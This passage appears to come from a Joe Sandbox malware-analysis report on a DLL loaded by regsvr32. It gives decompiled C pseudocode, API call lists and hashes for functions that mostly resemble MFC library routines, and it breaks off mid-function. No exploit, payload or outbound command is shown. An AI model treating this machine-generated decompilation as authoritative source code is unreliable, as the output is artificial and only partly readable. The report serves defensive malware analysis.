                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$IntersectRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1124862357-0
                                                                                                                • Opcode ID: 898a4ed08d5cfce531f3a23dd7598b99bfb1a0a6b791b3a14d4b035569a66b21
                                                                                                                • Instruction ID: 1907e4bbe30104e178743dfcac76d675819c36da8094fba4364036f7f07b8e73
                                                                                                                • Opcode Fuzzy Hash: 898a4ed08d5cfce531f3a23dd7598b99bfb1a0a6b791b3a14d4b035569a66b21
                                                                                                                • Instruction Fuzzy Hash: 88518372A00209DFCB45DFA8C9C5A9EBBF4FF08351F144596E905EB24AE730E980CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002CEBB Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 42%
                                                                                                                			E1002CEBB(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t42;
				void* _t46;
				void* _t47;
				void* _t52;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t76;
				void* _t96;
				void* _t97;
				intOrPtr* _t98;
				void* _t99;
				short* _t101;
				void* _t102;
				signed int _t103;
				void* _t105;

				_t96 = __edx;
				_t103 = _t105 - 0x8c;
				_t42 =  *0x1006dbdc; // 0xdf7c0cda
				 *(_t103 + 0x88) = _t42 ^ _t103;
				_t74 =  *((intOrPtr*)(_t103 + 0x98));
				_t101 =  *((intOrPtr*)(_t103 + 0x94));
				_push(_t97);
				E1003BB70(_t97, _t101, 0, 0x20);
				 *((intOrPtr*)(_t103 - 0x80)) = _t103 - 0x78;
				_t46 = E1001EFEF(_t74, 0x1005cd50);
				_t98 = __imp__#2;
				if(_t46 == 0) {
					_t78 = _t74;
					_t47 = E1001EFEF(_t74, 0x1005a0cc);
					__eflags = _t47;
					_push(0x100);
					_push(_t103 - 0x78);
					if(_t47 == 0) {
						_push(0xf108);
						E100249AA(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf108;
					} else {
						_push(0xf10a);
						E100249AA(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf10a;
					}
				} else {
					 *((intOrPtr*)(_t103 - 0x80)) =  *((intOrPtr*)(_t74 + 0xc));
					 *_t101 =  *((intOrPtr*)(_t74 + 8));
					 *((intOrPtr*)(_t101 + 0x10)) =  *((intOrPtr*)(_t74 + 0x10));
					 *((intOrPtr*)(_t101 + 0x1c)) =  *((intOrPtr*)(_t74 + 0x1c));
					_t66 =  *((intOrPtr*)(_t74 + 0x14));
					_t111 =  *((intOrPtr*)(_t66 - 0xc));
					if( *((intOrPtr*)(_t66 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E100169AB(_t74, _t103 - 0x7c, _t98, _t101, _t111))), _t66);
						E10001020( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
					_t74 =  *((intOrPtr*)(_t74 + 0x18));
					_t113 =  *((intOrPtr*)(_t74 - 0xc));
					if( *((intOrPtr*)(_t74 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E100169AB(_t74, _t103 - 0x7c, _t98, _t101, _t113))), _t74);
						E10001020( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				 *((intOrPtr*)(_t101 + 8)) =  *_t98( *((intOrPtr*)(E100169AB(_t74, _t103 - 0x7c, _t98, _t101, _t113))),  *((intOrPtr*)(_t103 - 0x80)));
				_t52 = E10001020( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				_t114 =  *((intOrPtr*)(_t101 + 4));
				if( *((intOrPtr*)(_t101 + 4)) == 0) {
					 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E100169AB(0, _t103 - 0x7c, _t98, _t101, _t114))),  *((intOrPtr*)(E10023187(0, _t98, _t101, _t114) + 0x10)));
					_t52 = E10001020( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				}
				if( *((intOrPtr*)(_t101 + 0xc)) == 0) {
					_t117 =  *((intOrPtr*)(_t101 + 0x10));
					if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E100169AB(0, _t103 - 0x7c, _t98, _t101, _t117))),  *((intOrPtr*)( *((intOrPtr*)(E10023187(0, _t98, _t101, _t117) + 4)) + 0x64)));
						_t52 = E10001020( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				_pop(_t99);
				_pop(_t102);
				_pop(_t76);
				return E1003B437(_t52, _t76,  *(_t103 + 0x88) ^ _t103, _t96, _t99, _t102);
			}






















                                                                                                                0x1002cebb
                                                                                                                0x1002cebc
                                                                                                                0x1002cec9
                                                                                                                0x1002ced0
                                                                                                                0x1002ced7
                                                                                                                0x1002cede
                                                                                                                0x1002cee4
                                                                                                                0x1002ceea
                                                                                                                0x1002cefc
                                                                                                                0x1002ceff
                                                                                                                0x1002cf06
                                                                                                                0x1002cf0c
                                                                                                                0x1002cf76
                                                                                                                0x1002cf78
                                                                                                                0x1002cf7d
                                                                                                                0x1002cf7f
                                                                                                                0x1002cf87
                                                                                                                0x1002cf88
                                                                                                                0x1002cf9b
                                                                                                                0x1002cfa0
                                                                                                                0x1002cfa5
                                                                                                                0x1002cf8a
                                                                                                                0x1002cf8a
                                                                                                                0x1002cf8f
                                                                                                                0x1002cf94
                                                                                                                0x1002cf94
                                                                                                                0x1002cf0e
                                                                                                                0x1002cf11
                                                                                                                0x1002cf18
                                                                                                                0x1002cf1e
                                                                                                                0x1002cf24
                                                                                                                0x1002cf27
                                                                                                                0x1002cf2a
                                                                                                                0x1002cf2e
                                                                                                                0x1002cf43
                                                                                                                0x1002cf46
                                                                                                                0x1002cf46
                                                                                                                0x1002cf4b
                                                                                                                0x1002cf4e
                                                                                                                0x1002cf52
                                                                                                                0x1002cf67
                                                                                                                0x1002cf6a
                                                                                                                0x1002cf6a
                                                                                                                0x1002cf52
                                                                                                                0x1002cfbf
                                                                                                                0x1002cfc2
                                                                                                                0x1002cfc9
                                                                                                                0x1002cfcc
                                                                                                                0x1002cfe8
                                                                                                                0x1002cfeb
                                                                                                                0x1002cfeb
                                                                                                                0x1002cff3
                                                                                                                0x1002cff5
                                                                                                                0x1002cff8
                                                                                                                0x1002d017
                                                                                                                0x1002d01a
                                                                                                                0x1002d01a
                                                                                                                0x1002cff8
                                                                                                                0x1002d025
                                                                                                                0x1002d026
                                                                                                                0x1002d029
                                                                                                                0x1002d036

                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 1002CEEA
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1002CF3B
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1002CF5F
                                                                                                                  • Part of subcall function 100169AB: __EH_prolog3.LIBCMT ref: 100169B2
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1002CFB7
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1002CFE0
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1002D00F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocString$H_prolog3_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 842698744-0
                                                                                                                • Opcode ID: 1ad4ebbb07aab1396dbf860e7577c569fbcf0b53b1807751158e8712bc95d39a
                                                                                                                • Instruction ID: bcd7e1732aa2736c2d57e1b675d4a123f59b1e6f79136b948c7992e5336b28ff
                                                                                                                • Opcode Fuzzy Hash: 1ad4ebbb07aab1396dbf860e7577c569fbcf0b53b1807751158e8712bc95d39a
                                                                                                                • Instruction Fuzzy Hash: FA414D349002489FDB20DFB4DC91A9DB7F5EF04314F10852EE5669B2A6DB70A858CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100216C1 Relevance: 9.1, APIs: 6, Instructions: 115threadwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E100216C1(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
				CHAR* _t64;
				void* _t65;
				void* _t67;
				void* _t71;
				void* _t72;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x1006dbdc; // 0xdf7c0cda
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E100215E2(0);
				_t67 = _t72;
				_t63 = E10021616(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E100186FB(_t64, _t67, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E100215E2(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E1003B437(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}
























                                                                                                                0x100216c1
                                                                                                                0x100216c2
                                                                                                                0x100216cf
                                                                                                                0x100216d6
                                                                                                                0x100216e5
                                                                                                                0x100216eb
                                                                                                                0x100216ee
                                                                                                                0x100216f1
                                                                                                                0x100216f6
                                                                                                                0x10021701
                                                                                                                0x10021706
                                                                                                                0x10021709
                                                                                                                0x1002170e
                                                                                                                0x1002170e
                                                                                                                0x10021714
                                                                                                                0x1002171c
                                                                                                                0x10021724
                                                                                                                0x10021749
                                                                                                                0x10021749
                                                                                                                0x1002174b
                                                                                                                0x1002174d
                                                                                                                0x1002174d
                                                                                                                0x00000000
                                                                                                                0x10021731
                                                                                                                0x1002173b
                                                                                                                0x10021743
                                                                                                                0x00000000
                                                                                                                0x10021745
                                                                                                                0x10021745
                                                                                                                0x10021750
                                                                                                                0x10021750
                                                                                                                0x10021756
                                                                                                                0x1002175a
                                                                                                                0x1002175d
                                                                                                                0x10021765
                                                                                                                0x1002176c
                                                                                                                0x1002176c
                                                                                                                0x10021765
                                                                                                                0x10021775
                                                                                                                0x1002177d
                                                                                                                0x10021783
                                                                                                                0x10021796
                                                                                                                0x10021796
                                                                                                                0x10021796
                                                                                                                0x10021785
                                                                                                                0x1002178b
                                                                                                                0x1002178d
                                                                                                                0x1002178d
                                                                                                                0x1002178b
                                                                                                                0x10021783
                                                                                                                0x1002179d
                                                                                                                0x1002179f
                                                                                                                0x100217a3
                                                                                                                0x100217aa
                                                                                                                0x100217ad
                                                                                                                0x100217be
                                                                                                                0x100217c0
                                                                                                                0x100217c2
                                                                                                                0x100217c2
                                                                                                                0x100217a5
                                                                                                                0x100217a5
                                                                                                                0x100217a5
                                                                                                                0x100217c9
                                                                                                                0x100217cf
                                                                                                                0x100217d0
                                                                                                                0x100217d3
                                                                                                                0x100217e0
                                                                                                                0x100217e2
                                                                                                                0x100217e7
                                                                                                                0x100217e7
                                                                                                                0x100217ed
                                                                                                                0x100217f4
                                                                                                                0x100217f4
                                                                                                                0x100217fc
                                                                                                                0x1002180a
                                                                                                                0x1002180b
                                                                                                                0x1002180e
                                                                                                                0x1002181b
                                                                                                                0x1002181b
                                                                                                                0x10021743

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10021616: GetParent.USER32(?), ref: 10021669
                                                                                                                  • Part of subcall function 10021616: GetLastActivePopup.USER32(?), ref: 10021678
                                                                                                                  • Part of subcall function 10021616: IsWindowEnabled.USER32(?), ref: 1002168D
                                                                                                                  • Part of subcall function 10021616: EnableWindow.USER32(?,00000000), ref: 100216A0
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 1002170E
                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 1002171C
                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000), ref: 10021726
                                                                                                                • SendMessageA.USER32 ref: 1002173B
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000), ref: 100217B8
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 100217F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1877664794-0
                                                                                                                • Opcode ID: 39ff1a4d23844597463116a229f351031421c7d1d861e8b014c9d760862aaf35
                                                                                                                • Instruction ID: 8cf2a1d449e5ea0776503a07d191ef3b2a443f422876c6f2f627263f70026bf5
                                                                                                                • Opcode Fuzzy Hash: 39ff1a4d23844597463116a229f351031421c7d1d861e8b014c9d760862aaf35
                                                                                                                • Instruction Fuzzy Hash: EA419C3AA04258DFEB31CFA4EC85BDD7BF8EF99350F600119E9499B281D77099448F60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003A01A Relevance: 9.1, APIs: 6, Instructions: 101windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E1003A01A(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct tagMSG _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t36;
				intOrPtr* _t37;
				void* _t41;
				intOrPtr _t53;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;

				_t55 = __edx;
				_t51 = __ecx;
				_t56 = GetCapture;
				_t57 = __ecx;
				if(GetCapture() != 0) {
					L20:
					return 0;
				}
				E10019C16(0, _t51, _t58, SetCapture( *( *((intOrPtr*)(_t57 + 0x68)) + 0x20)));
				if(E10019C16(0, _t51, _t58, GetCapture()) !=  *((intOrPtr*)(_t57 + 0x68))) {
					L19:
					E10039E8D(0, _t57, _t69);
					goto L20;
				} else {
					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
						_t30 = _v32.message - 0x100;
						if(_t30 == 0) {
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							if( *((intOrPtr*)(_t57 + 0x88)) != 0) {
								_t51 = _t57;
								E10039CE5(_t57, _v32.wParam, 1);
							}
							__eflags = _v32.wParam - 0x1b;
							if(__eflags != 0) {
								L18:
								_t32 = E10019C16(0, _t51, _t58, GetCapture());
								_t69 = _t32 -  *((intOrPtr*)(_t57 + 0x68));
								if(_t32 ==  *((intOrPtr*)(_t57 + 0x68))) {
									continue;
								}
							}
							goto L19;
						}
						_t34 = _t30 - 1;
						if(_t34 == 0) {
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							if(__eflags != 0) {
								_t51 = _t57;
								E10039CE5(_t57, _v32.wParam, 0);
							}
							goto L18;
						}
						_t36 = _t34 - 0xff;
						if(_t36 == 0) {
							_t53 = _v32.pt;
							_t55 = _v8;
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							_push(_t53);
							_push(_t53);
							_t37 = _t59;
							 *_t37 = _t53;
							 *((intOrPtr*)(_t37 + 4)) = _v8;
							_t51 = _t57;
							if( *((intOrPtr*)(_t57 + 0x88)) == 0) {
								E10039D19(_t51, _t56);
							} else {
								E10039C69(_t51);
							}
							goto L18;
						}
						_t41 = _t36;
						if(_t41 == 0) {
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							_t54 = _t57;
							if(__eflags == 0) {
								E10039FD6(0, _t58, __eflags);
							} else {
								E10039ED2(_t54, _t55, _t56, _t57, __eflags);
							}
							return 1;
						}
						if(_t41 == 0) {
							goto L19;
						}
						DispatchMessageA( &_v32);
						goto L18;
					}
					_push(_v32.wParam);
					E10025696();
					goto L19;
				}
			}





















                                                                                                                0x1003a01a
                                                                                                                0x1003a01a
                                                                                                                0x1003a023
                                                                                                                0x1003a029
                                                                                                                0x1003a02f
                                                                                                                0x1003a109
                                                                                                                0x00000000
                                                                                                                0x1003a109
                                                                                                                0x1003a042
                                                                                                                0x1003a052
                                                                                                                0x1003a102
                                                                                                                0x1003a104
                                                                                                                0x00000000
                                                                                                                0x1003a058
                                                                                                                0x1003a05a
                                                                                                                0x1003a072
                                                                                                                0x1003a077
                                                                                                                0x1003a0d7
                                                                                                                0x1003a0dd
                                                                                                                0x1003a0e4
                                                                                                                0x1003a0e6
                                                                                                                0x1003a0e6
                                                                                                                0x1003a0eb
                                                                                                                0x1003a0ef
                                                                                                                0x1003a0f1
                                                                                                                0x1003a0f4
                                                                                                                0x1003a0f9
                                                                                                                0x1003a0fc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a0fc
                                                                                                                0x00000000
                                                                                                                0x1003a0ef
                                                                                                                0x1003a079
                                                                                                                0x1003a07a
                                                                                                                0x1003a0c2
                                                                                                                0x1003a0c8
                                                                                                                0x1003a0ce
                                                                                                                0x1003a0d0
                                                                                                                0x1003a0d0
                                                                                                                0x00000000
                                                                                                                0x1003a0c8
                                                                                                                0x1003a07c
                                                                                                                0x1003a081
                                                                                                                0x1003a09b
                                                                                                                0x1003a09e
                                                                                                                0x1003a0a1
                                                                                                                0x1003a0a7
                                                                                                                0x1003a0a8
                                                                                                                0x1003a0a9
                                                                                                                0x1003a0ab
                                                                                                                0x1003a0ad
                                                                                                                0x1003a0b0
                                                                                                                0x1003a0b2
                                                                                                                0x1003a0bb
                                                                                                                0x1003a0b4
                                                                                                                0x1003a0b4
                                                                                                                0x1003a0b4
                                                                                                                0x00000000
                                                                                                                0x1003a0b2
                                                                                                                0x1003a084
                                                                                                                0x1003a085
                                                                                                                0x1003a11a
                                                                                                                0x1003a120
                                                                                                                0x1003a122
                                                                                                                0x1003a12b
                                                                                                                0x1003a124
                                                                                                                0x1003a124
                                                                                                                0x1003a124
                                                                                                                0x00000000
                                                                                                                0x1003a132
                                                                                                                0x1003a08d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a093
                                                                                                                0x00000000
                                                                                                                0x1003a093
                                                                                                                0x1003a110
                                                                                                                0x1003a113
                                                                                                                0x00000000
                                                                                                                0x1003a113

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Capture$Message$Dispatch
                                                                                                                • String ID:
                                                                                                                • API String ID: 3654672037-0
                                                                                                                • Opcode ID: c596d68e30430a79b54defb51de4afb41233d22cbb584f62e734db44dfbab682
                                                                                                                • Instruction ID: 161f1fa8784e329d9030d683eb53ce190b162bb7d2631bbf5091d90f03dabacf
                                                                                                                • Opcode Fuzzy Hash: c596d68e30430a79b54defb51de4afb41233d22cbb584f62e734db44dfbab682
                                                                                                                • Instruction Fuzzy Hash: 34319575E002099FDB67EBB5C88596FB7E9EB46383F104429F546DB151CA30ACC0D6B1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000C050 Relevance: 9.1, APIs: 6, Instructions: 79threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1000C050() {
				long _v4;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				int _t19;
				void* _t37;
				void* _t38;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t53;
				void* _t55;
				void* _t57;

				_t37 = GetExitCodeThread;
				_t57 = _t38;
				_v4 = 0;
				_t19 = GetExitCodeThread( *(_t57 + 0x290),  &_v4);
				_t55 = TerminateThread;
				if(_t19 != 0 && _v4 == 0x103) {
					_t53 =  *0x1006f050; // 0x0
					TerminateThread( *(_t53 + 0x290), 0);
					_t50 =  *0x1006f050; // 0x0
					TerminateThread( *(_t50 + 0x28c), 0);
				}
				if(GetExitCodeThread( *(_t57 + 0x294),  &_v4) != 0) {
					_t61 = _v4 - 0x103;
					if(_v4 == 0x103) {
						_t51 =  *0x1006f050; // 0x0
						TerminateThread( *(_t51 + 0x294), 0);
						_t49 =  *0x1006f050; // 0x0
						TerminateThread( *(_t49 + 0x28c), 0);
					}
				}
				E1000BDC0(_t57);
				E1002181C(_t37, _t55, _t57, _t61, 0x10058350, 0, 0);
				E1001D2C4(_t57 + 0x4fc, 0x10056948);
				E1001D39A(_t57 + 0x4a8, 1);
				_t56 = _t57 + 0x400;
				E1001D2C4(_t57 + 0x400, 0x10058344);
				E1001D39A(_t56, 0);
				E1001D39A(_t57 + 0x3ac, 0);
				E1001D35E(_t57 + 0x304, 0);
				return E1001D35E(_t57 + 0x454, 0);
			}

















                                                                                                                0x1000c052
                                                                                                                0x1000c05a
                                                                                                                0x1000c068
                                                                                                                0x1000c070
                                                                                                                0x1000c074
                                                                                                                0x1000c07a
                                                                                                                0x1000c086
                                                                                                                0x1000c095
                                                                                                                0x1000c097
                                                                                                                0x1000c0a6
                                                                                                                0x1000c0a6
                                                                                                                0x1000c0b8
                                                                                                                0x1000c0ba
                                                                                                                0x1000c0c2
                                                                                                                0x1000c0c4
                                                                                                                0x1000c0d3
                                                                                                                0x1000c0d5
                                                                                                                0x1000c0e4
                                                                                                                0x1000c0e4
                                                                                                                0x1000c0c2
                                                                                                                0x1000c0e8
                                                                                                                0x1000c0f6
                                                                                                                0x1000c106
                                                                                                                0x1000c113
                                                                                                                0x1000c118
                                                                                                                0x1000c125
                                                                                                                0x1000c12e
                                                                                                                0x1000c13b
                                                                                                                0x1000c148
                                                                                                                0x1000c15e

                                                                                                                APIs
                                                                                                                • GetExitCodeThread.KERNEL32(?,?), ref: 1000C070
                                                                                                                • TerminateThread.KERNEL32(?,00000000), ref: 1000C095
                                                                                                                • TerminateThread.KERNEL32(?,00000000), ref: 1000C0A6
                                                                                                                • GetExitCodeThread.KERNEL32(?,?), ref: 1000C0B4
                                                                                                                • TerminateThread.KERNEL32(?,00000000), ref: 1000C0D3
                                                                                                                • TerminateThread.KERNEL32(?,00000000), ref: 1000C0E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$Terminate$CodeExit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2071244642-0
                                                                                                                • Opcode ID: 78a4932f579bf6e9c3620fb0e200f1d90823c1be10801c14a95c4df0e19e25e4
                                                                                                                • Instruction ID: cfd30c2ca969df88c694a723c38db842dd91de19b659530daa4bf16111861b96
                                                                                                                • Opcode Fuzzy Hash: 78a4932f579bf6e9c3620fb0e200f1d90823c1be10801c14a95c4df0e19e25e4
                                                                                                                • Instruction Fuzzy Hash: BE21C435200306ABE714E720DC95FABB399EF94714F10891DF2599B1C1CBB0BA46CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10026E8C Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10026E8C(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t78;
				void* _t79;
				void* _t80;

				_t80 = __eflags;
				E1003D1E6(E10054CC2, __ebx, __edi, __esi);
				_t78 = __ecx;
				E10024650(__ebx, _t79 - 0x40, __edi, __ecx, _t80);
				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
				GetClientRect( *(_t78 + 0x20), _t79 - 0x2c);
				GetWindowRect( *(_t78 + 0x20), _t79 - 0x1c);
				E10024274(_t78, _t79 - 0x1c);
				OffsetRect(_t79 - 0x2c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
				E10023DD2(_t79 - 0x40, _t79 - 0x2c);
				OffsetRect(_t79 - 0x1c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
				 *((intOrPtr*)( *_t78 + 0x148))(_t79 - 0x40, _t79 - 0x1c, __ecx, 0x34);
				E10023E14(_t79 - 0x40, _t79 - 0x1c);
				SendMessageA( *(_t78 + 0x20), 0x14,  *(_t79 - 0x3c), 0);
				 *((intOrPtr*)( *_t78 + 0x14c))(_t79 - 0x40, _t79 - 0x1c);
